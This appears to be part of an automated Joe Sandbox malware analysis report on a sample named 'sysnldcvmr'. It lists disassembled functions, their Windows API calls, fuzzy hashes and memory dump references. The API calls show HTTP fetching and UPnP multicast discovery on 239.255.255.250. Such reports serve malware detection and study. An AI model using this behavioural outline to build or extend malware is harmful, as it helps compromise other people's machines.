                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                    • String ID:
                                                                    • API String ID: 459949847-0
                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                    Function 00407030 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFreeInstanceString
                                                                    • String ID: Microsoft Corporation
                                                                    • API String ID: 586785272-3838278685
                                                                    • Opcode ID: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                    • Opcode Fuzzy Hash: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                    Function 0040D980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                    • String ID: %S%S
                                                                    • API String ID: 1017111014-3267608656
                                                                    • Opcode ID: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                    • Opcode Fuzzy Hash: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                    Function 0040D640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                    • String ID: TCP$UDP
                                                                    • API String ID: 1519345861-1097902612
                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                    Function 0040D250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                    • CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleObjectSingleWait
                                                                    • String ID: .Mw
                                                                    • API String ID: 528846559-2453323595
                                                                    • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                    • Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
                                                                    • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                    • Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95
                                                                    Function 00405EB0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,?,?), ref: 00405EBF
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 469056452-0
                                                                    • Opcode ID: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                    • Opcode Fuzzy Hash: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A